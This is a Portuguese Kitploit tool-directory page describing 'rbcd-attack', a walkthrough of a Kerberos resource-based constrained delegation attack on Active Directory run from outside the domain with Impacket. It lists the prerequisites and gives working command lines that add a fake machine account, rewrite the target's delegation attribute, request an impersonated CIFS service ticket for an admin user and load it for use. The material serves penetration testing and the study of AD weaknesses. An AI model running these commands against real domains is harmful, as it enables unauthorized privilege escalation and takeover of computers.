Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/tothi/rbcd-attack
Escalada de PrivilégiosExploraçãoTestes de Penetração
GitHubtothi/rbcd-attack

rbcd-attack

Ataque de Delegação Restrita Baseada em Recursos do Kerberos a partir de fora usando Impacket

Ver Repositório
6467244há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Abusando da Delegação Restrita Baseada em Recursos do Kerberos

TL;DR

Este repositório é sobre um ataque prático contra a Delegação Restrita Baseada em Recursos do Kerberos em um Domínio Active Directory do Windows.

A diferença de outras implementações comuns é que estamos lançando o ataque de fora do Domínio Windows, não de um computador associado ao domínio (geralmente Windows).

O ataque é implementado usando apenas Python3 Impacket (e suas dependências). Testado no Arch com Impacket atualizado (0.9.21 no momento da escrita).

Attack Log

O Ataque

Em resumo, sem muitos detalhes profundos, o ataque tem como alvo um computador do domínio, exatamente os principais de serviço relacionados ao computador de destino do domínio.

O que precisamos aqui como pré-requisitos:

  • uma conta de domínio com acesso de gravação ao computador alvo (exatamente acesso de gravação à propriedade msDS-AllowedToActOnBehalfOfOtherIdentity do objeto de computador alvo do domínio)
  • permissão para criar novas contas de computador (normalmente é padrão, veja MachineAccountQuota)
  • acesso LDAP (389/tcp) e SAMR (445/tcp) (ou LDAPS (636/tcp)) ao DC.
  • acesso Kerberos (88/tcp) ao DC

O caminho do ataque em um nível muito alto:

  1. Criar um computador falso
  2. Abusar da propriedade msDS-AllowedToActOnBehalfOfOtherIdentity do alvo
  3. Solicitar Tickets de Serviço impersonados (S4U) para o computador alvo

Benefício:

  • Tickets de Serviço impersonados podem permitir acesso de alto nível a serviços no alvo como CIFS, HTTP, etc, se a conta impersonada tiver privilégios. Às vezes, a tomada total do computador.

Conjuntos de ferramentas comuns

Os conjuntos de ferramentas comuns para este ataque operam em um computador Windows associado ao domínio usando:

  • Powermad para adicionar novas contas de computador
  • Powerview do branch dev do PowerSploit para abusar da msDS-AllowedToActOnBehalfOfOtherIdentity
  • Rubeus para operações de tickets S4U

Implementação Impacket

Esta implementação usa o Impacket puro de fora do Domínio.

Criando o computador falso

Usando o exemplo addcomputer.py do Impacket, vamos criar um computador falso (chamado evilcomputer):

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modificando os direitos de delegação

Implementado o script rbcd.py encontrado aqui no repositório, que adiciona o descritor de segurança relacionado do EVILCOMPUTER recém-criado à propriedade msDS-AllowedToActOnBehalfOfOtherIdentity do computador alvo.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

O script usa fortemente as classes Python no exemplo ntlmrelayx.py do Impacket. Para ajuda e um exemplo, chame o script sem opções.

Obtendo o ticket de serviço impersonado

Agora tudo está pronto para abusar da Delegação Restrita por meio de uma consulta S4U2Self e obter um Ticket de Serviço impersonado para o computador alvo. Com o script de exemplo getST.py do Impacket:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

O comando acima busca um Ticket de Serviço CIFS em nome do usuário de domínio alvo admin e o armazena no arquivo admin.ccache.

Após adicionar o caminho do arquivo à variável KRB5CCNAME, o ticket fica utilizável para clientes Kerberos.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

Referências

Para detalhes sobre abusar da Delegação Restrita Baseada em Recursos:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

E uma das apresentações mais abrangentes sobre Ataques Kerberos:

  • slides Construindo Ataques Kerberos com Primitivas de Delegação na Defcon por Elad Shamir e Matt Bush
Baixar ferramenta